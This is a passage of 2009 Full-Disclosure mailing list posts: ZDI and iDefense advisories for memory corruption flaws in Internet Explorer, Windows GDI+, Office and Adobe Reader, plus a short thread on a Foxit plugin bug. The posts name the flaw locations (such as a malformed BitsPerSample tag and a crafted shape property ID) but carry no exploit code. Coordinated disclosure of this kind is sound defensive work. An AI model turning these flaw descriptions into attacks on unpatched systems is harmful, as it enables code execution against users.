When specifying a malicious sample rate for a Windows Media Voice frame,
memory corruption can occur. Successful exploitation of this
vulnerability can lead to remote compromise of the affected system under
the credentials of the currently logged in user.

-- Vendor Response:
Microsoft has issued an update to correct this vulnerability. More
details can be found at:

http://www.microsoft.com/technet/security/bulletin/ms09-051.mspx

-- Disclosure Timeline:
2008-04-16 - Vulnerability reported to vendor
2009-10-13 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Ivan Fratric

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

[Full-disclosure] ZDI-09-070: Microsoft Internet Explorer Event Object Type Double-Free Vulnerability

2009-10-13 Thread ZDI Disclosures
ZDI-09-070: Microsoft Internet Explorer Event Object Type Double-Free 
Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-09-070
October 13, 2009

-- CVE ID:
CVE-2009-2530

-- Affected Vendors:
Microsoft

-- Affected Products:
Microsoft Internet Explorer 6
Microsoft Internet Explorer 7
Microsoft Internet Explorer 8

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 8653. 
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Microsoft Internet Explorer. User
interaction is required to exploit this vulnerability in that the target
must visit a malicious page.

The specific flaw exists within the copy constructor for a specific DOM
object. When duplicated, more than one reference can be made to anything
assigned to its properties. When the variable/object goes out of scope,
these properties will be deallocated twice. This results in a heap
corruption which can lead to code execution under the context of the
current user.

-- Vendor Response:
Microsoft has issued an update to correct this vulnerability. More
details can be found at:

http://www.microsoft.com/technet/security/bulletin/ms09-054.mspx

-- Disclosure Timeline:
2009-06-23 - Vulnerability reported to vendor
2009-10-13 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Anonymous
* Anonymous

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

[Full-disclosure] ZDI-09-071: Microsoft Internet Explorer writing-mode Memory Corruption Vulnerability

2009-10-13 Thread ZDI Disclosures
ZDI-09-071: Microsoft Internet Explorer writing-mode Memory Corruption 
Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-09-071
October 13, 2009

-- CVE ID:
CVE-2009-2531

-- Affected Vendors:
Microsoft

-- Affected Products:
Microsoft Internet Explorer 6
Microsoft Internet Explorer 7
Microsoft Internet Explorer 8

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 8654. 
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Microsoft Internet Explorer. User
interaction is required in that a user must visit a malicious web page.

The specific flaw exists in the parsing of CSS style information. When a
writing-mode style is used with a specific combination of HTML tags,
memory corruption occurs. Exploitation of this vulnerability will lead
to remote system compromise under the credentials of the currently
logged in user.

-- Vendor Response:
Microsoft has issued an update to correct this vulnerability. More
details can be found at:

http://www.microsoft.com/technet/security/bulletin/ms09-054.mspx

-- Disclosure Timeline:
2009-06-23 - Vulnerability reported to vendor
2009-10-13 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Sam Thomas of eshu.co.uk

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

[Full-disclosure] ZDI-09-072: Microsoft Windows GDI+ TIFF Parsing Code Execution Vulnerability

2009-10-13 Thread ZDI Disclosures
ZDI-09-072: Microsoft Windows GDI+ TIFF Parsing Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-09-072
October 13, 2009

-- CVE ID:
CVE-2009-2503

-- Affected Vendors:
Microsoft

-- Affected Products:
Microsoft Windows Vista
Microsoft Windows XP
Microsoft Windows Server 2003
Microsoft Windows Server 2008

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 8661. 
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Microsoft Windows. User interaction is
required in that a user must open a malicious image file or browse to a
malicious website.

The specific flaws exist in the GDI+ subsystem when parsing maliciously
crafted TIFF files. By supplying a malformed graphic control extension
an attacker can trigger an exploitable memory corruption condition.
Successful exploitation can result in arbitrary code execution under the
credentials of the currently logged in user.

-- Vendor Response:
Microsoft has issued an update to correct this vulnerability. More
details can be found at:

http://www.microsoft.com/technet/security/bulletin/ms09-062.mspx

-- Disclosure Timeline:
2008-02-07 - Vulnerability reported to vendor
2009-10-13 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Ivan Fratric

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

[Full-disclosure] ZDI-09-073: Adobe Reader Compact Font Format Malformed Index Memory Corruption Vulnerability

2009-10-13 Thread ZDI Disclosures
ZDI-09-073: Adobe Reader Compact Font Format Malformed Index Memory Corruption 
Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-09-073
October 13, 2009

-- CVE ID:
CVE-2009-2985

-- Affected Vendors:
Adobe

-- Affected Products:
Adobe Acrobat
Adobe Reader

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 8658. 
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Adobe Acrobat and Adobe Reader. User
interaction is required to exploit this vulnerability in that the target
must visit a malicious page or open a malicious file.

The specific flaw exists when the application parses a PDF file
containing a malformed Compact Font Format stream. While decoding the
font embedded in this stream, the application will explicitly trust a
16-bit value used to index into an array of elements. Usage of the
object later will cause heap corruption which can be leveraged to
achieve code execution under the context of the current user.

-- Vendor Response:
Adobe has issued an update to correct this vulnerability. More
details can be found at:

http://www.adobe.com/support/security/bulletins/apsb09-15.html

-- Disclosure Timeline:
2009-04-28 - Vulnerability reported to vendor
2009-10-13 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Anonymous

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

[Full-disclosure] iDefense Security Advisory 10.13.09: Microsoft Windows GDI+ TIFF File Parsing Buffer Overflow Vulnerability

2009-10-13 Thread iDefense Labs
iDefense Security Advisory 10.13.09
http://labs.idefense.com/intelligence/vulnerabilities/
Oct 13, 2009

I. BACKGROUND

The GDI+ library 'GdiPlus.dll' provides access to a number of graphics
methods via a class-based API. For more information on GDI+, please
visit the following URL.

http://msdn2.microsoft.com/en-us/library/ms533798.aspx

Tagged Image File Format (TIFF) is a container format for storing
images. For more information about TIFF, please visit the following URL.

http://partners.adobe.com/public/developer/tiff/index.html

II. DESCRIPTION

Remote exploitation of a heap based buffer overflow vulnerability in
Microsoft Corp.'s Windows GDI+ could allow an attacker to execute
arbitrary code with the privileges of the current user.

This vulnerability occurs when parsing a malformed TIFF file. By
supplying incorrect values in a BitsPerSample tag, it is possible to
trigger a heap based buffer overflow.

III. ANALYSIS

Successful exploitation allows an attacker to execute arbitrary code in
the context of the current user. Social engineering is required, as an
attacker must trick a user into viewing an image in the web browser,
viewing an e-mail with an embedded image, opening an Office file with an
embedded image, or downloading an image file and opening it within a
graphics rendering program.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in Windows XP
Service Pack 2. Please see the Microsoft bulletin for additional details
on affected software.

V. WORKAROUND

The following workarounds can be employed to mitigate exposure to this
vulnerability:

*Restrict access to gdiplus.dll
*Unregister vgx.dll

Instructions for employing/removing these workarounds can be found in
the bulletin.

VI. VENDOR RESPONSE

Microsoft has released a patch which addresses this issue. For more
information, consult their advisory at the following URL:

http://www.microsoft.com/technet/security/Bulletin/MS09-062.mspx

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2009-2502 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

12/18/2007  - Initial Contact
12/18/2007  - Initial Response
12/19/2007  - PoC Requested
12/19/2007  - PoC Sent
01/14/2008  - Status update received
03/27/2008  - Status update requested
03/28/2008  - Status update received - no estimated release date
04/28/2008  - Status update requested
04/28/2008  - Status update received - no estimated release date
01/11/2009  - Vendor states updates being silently released soon,
estimates Summer bulletin release
02/26/2009  - Vendor proposed tentative disclosure date of 08/11/2009
03/05/2009  - Status update requested
04/23/2009  - Vendor reset disclosure to 10/13/2009
10/13/2009  - Coordinated public disclosure.

IX. CREDIT

This vulnerability was reported to iDefense by wushi of team509.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2009 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerserv...@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
 There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.


[Full-disclosure] iDefense Security Advisory 10.13.09: Microsoft Office Drawing Format Shape Properties Memory Corruption Vulnerability

2009-10-13 Thread iDefense Labs
iDefense Security Advisory 10.13.09
http://labs.idefense.com/intelligence/vulnerabilities/
Oct 13, 2009

I. BACKGROUND

Microsoft Office is a suite of products used for document, spreadsheet,
and presentation creation and viewing. Office Drawing Format is a
binary file format developed by Microsoft. It is used by all Office
programs to represent information about different types of shapes and
drawings commonly used in Office applications. For more information see
the vendor's website.

http://office.microsoft.com/

II. DESCRIPTION

Remote exploitation of a memory corruption vulnerability in Microsoft
Corp.'s Office could allow an attacker to execute arbitrary code with
the privileges of the current user.

The vulnerability occurs when parsing the msofbtOPT Office Drawing
record type. This record is used to provide default values for shape
properties. By inserting a specially crafted property ID, it is
possible to corrupt heap memory and overwrite an object pointer.

III. ANALYSIS

Exploitation of this vulnerability results in the execution of arbitrary
code with the privileges of the user opening the file. To exploit this
vulnerability, an attacker needs to convince a user to open a malicious
file. After opening the file, no further interaction is needed to
trigger the vulnerability.

Due to the nature of the vulnerability, it is possible to reliably
overwrite an object pointer. This lets an attacker control the object's
virtual function table, which simplifies exploitation.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in Office XP
SP3.

V. WORKAROUND

The vulnerability occurs in the core parsing code, and this code cannot
be disabled; however, it is possible to disable the opening of the older
binary format files and use MOICE to convert the file to the newer
XML-based format.

VI. VENDOR RESPONSE

Microsoft has released a patch which addresses this issue. For more
information, consult their advisory at the following URL:

http://www.microsoft.com/technet/security/Bulletin/MS09-062.mspx

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2009-2528 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

04/25/2008  - Initial Contact
04/25/2008  - Initial Response
04/25/2008  - PoC Requested
07/21/2008  - PoC Requested
07/21/2008  - PoC Sent
12/11/2008  - Status Update Received - no estimated release date
02/19/2009  - Status Update Received - new case manager, estimated
release date 06/09/2009
10/13/2009  - Coordinated public disclosure

IX. CREDIT

This vulnerability was reported to iDefense by Marsu and an anonymous
contributor.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2009 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerserv...@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
 There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.


Re: [Full-disclosure] Memory corruption when loading/unloading Adobe objects through EMBED tag in Firefox

2009-10-13 Thread mrx

It would appear that Foxit reader version 3.1.1.0928 is also
vulnerable to this memory corruption flaw.
Foxit reader was also vulnerable to the JPEG2000/JBIG2 decoder bug.

Makes me wonder how much code is common to both Adobe's and Foxit's PDF
readers.

MrX


Berend-Jan Wever wrote:
 Adobe bulletin:
 http://www.adobe.com/support/security/bulletins/apsb09-15.html

 Short description and repro case:
 http://skypher.com/index.php/2009/10/13/memory-corruption-when-loadingunloading-adobe-objects-through-embed-tag-in-firefox/
 Cheers,

 SkyLined
 http://skypher.com/index.php/2009/10/13/memory-corruption-when-loadingunloading-adobe-objects-through-embed-tag-in-firefox/
 Berend-Jan Wever berendjanwe...@gmail.com
 http://skypher.com/SkyLined





Re: [Full-disclosure] Memory corruption when loading/unloading Adobe objects through EMBED tag in Firefox

2009-10-13 Thread Rohit Patnaik
Has Foxit released an update for this?

--Rohit Patnaik

On Tue, Oct 13, 2009 at 6:40 PM, mrx m...@propergander.org.uk wrote:


 It would appear that Foxit reader version 3.1.1.0928 is also
 vulnerable to this memory corruption flaw.
 Foxit reader was also vulnerable to the JPEG2000/JBIG2 decoder bug.

 Makes me wonder how much code is common to both Adobes and Foxits PDF
 readers

 MrX


 Berend-Jan Wever wrote:
  Adobe bulletin:
  http://www.adobe.com/support/security/bulletins/apsb09-15.html
 
  Short description and repro case:
 
 http://skypher.com/index.php/2009/10/13/memory-corruption-when-loadingunloading-adobe-objects-through-embed-tag-in-firefox/
  Cheers,
 
  SkyLined
  
 http://skypher.com/index.php/2009/10/13/memory-corruption-when-loadingunloading-adobe-objects-through-embed-tag-in-firefox/
 
  Berend-Jan Wever berendjanwe...@gmail.com
  http://skypher.com/SkyLined
 
 
  --
 
  ___
  Full-Disclosure - We believe in it.
  Charter: http://lists.grok.org.uk/full-disclosure-charter.html
  Hosted and sponsored by Secunia - http://secunia.com/




Re: [Full-disclosure] Memory corruption when loading/unloading Adobe objects through EMBED tag in Firefox

2009-10-13 Thread mrx

No, I installed the latest updates prior to testing.
They should be aware of this, however, considering what appear to be
striking similarities in the code base between Foxit and Adobe
readers, at least as far as shared bugs go.
If not, they will be aware of this after they read the email I sent them.

MrX

Rohit Patnaik wrote:
 Has Foxit released an update for this?

 --Rohit Patnaik





Re: [Full-disclosure] Memory corruption when loading/unloading Adobe objects through EMBED tag in Firefox

2009-10-13 Thread Rohit Patnaik
Are there any available workarounds that would mitigate the threat?  I
suppose I could just upload all my PDFs to Google Docs in the meantime, but
I'm looking for something that I could use while offline...

--Rohit Patnaik

On Tue, Oct 13, 2009 at 7:35 PM, mrx m...@propergander.org.uk wrote:


 No, I installed the latest updates prior to testing.
 They should be aware of this, however, considering what appear to be
 striking similarities in the code base between Foxit and Adobe
 readers, at least as far as shared bugs go.
 If not, they will be aware of this after they read the email I sent them.

 MrX



Re: [Full-disclosure] Memory corruption when loading/unloading Adobe objects through EMBED tag in Firefox

2009-10-13 Thread mrx

Adobe has fixed this issue:

http://www.adobe.com/support/security/bulletins/apsb09-15.html

And as this bug relates to Firefox rendering embedded COM objects
(PDF) inside a browser window, it should be safe to view PDFs inside
both Adobe and Foxit readers whilst offline.

MrX

Rohit Patnaik wrote:
 Are there any available workarounds that would mitigate the threat?  I
 suppose I could just upload all my PDFs to Google Docs in the meantime, but
 I'm looking for something that I could use while offline...

 --Rohit Patnaik




Re: [Full-disclosure] Memory corruption when loading/unloading Adobe objects through EMBED tag in Firefox

2009-10-13 Thread Rohit Patnaik
Ah, okay.  I do that anyway, because I've had bad experiences with Firefox
crashing when displaying embedded PDFs in the past.  Sounds like I should be
okay until Foxit updates its reader.

Thanks,
Rohit Patnaik

On Tue, Oct 13, 2009 at 8:15 PM, mrx m...@propergander.org.uk wrote:


 Adobe has fixed this issue:

 http://www.adobe.com/support/security/bulletins/apsb09-15.html

 And as this bug relates to Firefox rendering embedded COM objects
 (PDF) inside a browser window, it should be safe to view PDFs inside
 both Adobe and Foxit readers whilst offline.

 MrX


Re: [Full-disclosure] Memory corruption when loading/unloading Adobe objects through EMBED tag in Firefox

2009-10-13 Thread mrx

I should have made it clear in my first response to this thread that
it is the Foxit Firefox plugin that is vulnerable and not the
standalone reader.

my bad

MrX

Rohit Patnaik wrote:
 Ah, okay.  I do that anyway, because I've had bad experiences with Firefox
 crashing when displaying embedded PDFs in the past.  Sounds like I should be
 okay until Foxit updates its reader.

 Thanks,
 Rohit Patnaik




Re: [Full-disclosure] ZDI-09-070: Microsoft Internet Explorer Event Object Type Double-Free Vulnerability

2009-10-13 Thread 啊賢 .
Can this vulnerability affect IE8? Doesn't that mean it can bypass DEP+ASLR?

 Message: 14
 Date: Tue, 13 Oct 2009 14:24:43 -0500
 From: ZDI Disclosures zdi-disclosu...@tippingpoint.com
 Subject: [Full-disclosure] ZDI-09-070: Microsoft Internet Explorer Event Object Type Double-Free Vulnerability

 ZDI-09-070: Microsoft Internet Explorer Event Object Type Double-Free Vulnerability
 http://www.zerodayinitiative.com/advisories/ZDI-09-070
 October 13, 2009

 -- CVE ID:
 CVE-2009-2530

 -- Affected Vendors:
 Microsoft

 -- Affected Products:
 Microsoft Internet Explorer 6
 Microsoft Internet Explorer 7
 Microsoft Internet Explorer 8

 -- TippingPoint(TM) IPS Customer Protection:
 TippingPoint IPS customers have been protected against this
 vulnerability by Digital Vaccine protection filter ID 8653.
 For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

 -- Vulnerability Details:
 This vulnerability allows remote attackers to execute arbitrary code on
 vulnerable installations of Microsoft Internet Explorer. User
 interaction is required to exploit this vulnerability in that the target
 must visit a malicious page.

 The specific flaw exists within the copy constructor for a specific DOM
 object. When duplicated, more than one reference can be made of anything
 assigned to its properties. When the variable/object goes out of scope,
 these properties will be deallocated twice. This results in a heap
 corruption which can lead to code execution under the context of the
 current user.

 -- Vendor Response:
 Microsoft has issued an update to correct this vulnerability. More
 details can be found at:

 http://www.microsoft.com/technet/security/bulletin/ms09-054.mspx

 -- Disclosure Timeline:
 2009-06-23 - Vulnerability reported to vendor
 2009-10-13 - Coordinated public release of advisory

 -- Credit:
 This vulnerability was discovered by:
* Anonymous
* Anonymous

 -- About the Zero Day Initiative (ZDI):
 Established by TippingPoint, The Zero Day Initiative (ZDI) represents
 a best-of-breed model for rewarding security researchers for responsibly
 disclosing discovered vulnerabilities.

 Researchers interested in getting paid for their security research
 through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

 The ZDI is unique in how the acquired vulnerability information is
 used. TippingPoint does not re-sell the vulnerability details or any
 exploit code. Instead, upon notifying the affected product vendor,
 TippingPoint provides its customers with zero day protection through
 its intrusion prevention technology. Explicit details regarding the
 specifics of the vulnerability are not exposed to any parties until
 an official vendor patch is publicly available. Furthermore, with the
 altruistic aim of helping to secure a broader user base, TippingPoint
 provides this vulnerability information confidentially to security
 vendors (including competitors) who have a vulnerability protection or
 mitigation product.

 Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/


 --

 Message: 15
 Date: Tue, 13 Oct 2009 14:24:45 -0500
 From: ZDI Disclosures zdi-disclosu...@tippingpoint.com
 Subject: [Full-disclosure] ZDI-09-071: Microsoft Internet Explorer writing-mode Memory Corruption Vulnerability

 ZDI-09-071: Microsoft Internet Explorer writing-mode Memory Corruption Vulnerability
 http://www.zerodayinitiative.com/advisories/ZDI-09-071
 October 13, 2009

 -- CVE ID:
 CVE-2009-2531

 -- Affected Vendors:
 Microsoft

 -- Affected Products:
 Microsoft Internet Explorer 6
 Microsoft Internet Explorer 7
 Microsoft Internet Explorer 8

 -- TippingPoint(TM) IPS Customer Protection:
 TippingPoint IPS customers have been protected against this
 vulnerability by Digital Vaccine protection filter ID 8654.
 For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

 -- Vulnerability Details:
 This vulnerability allows remote attackers to execute arbitrary code on
 vulnerable installations of Microsoft Internet Explorer. User
 interaction is required in that a user must visit a malicious web page.

 The specific flaw exists in the parsing of CSS style information. When a
 writing-mode style is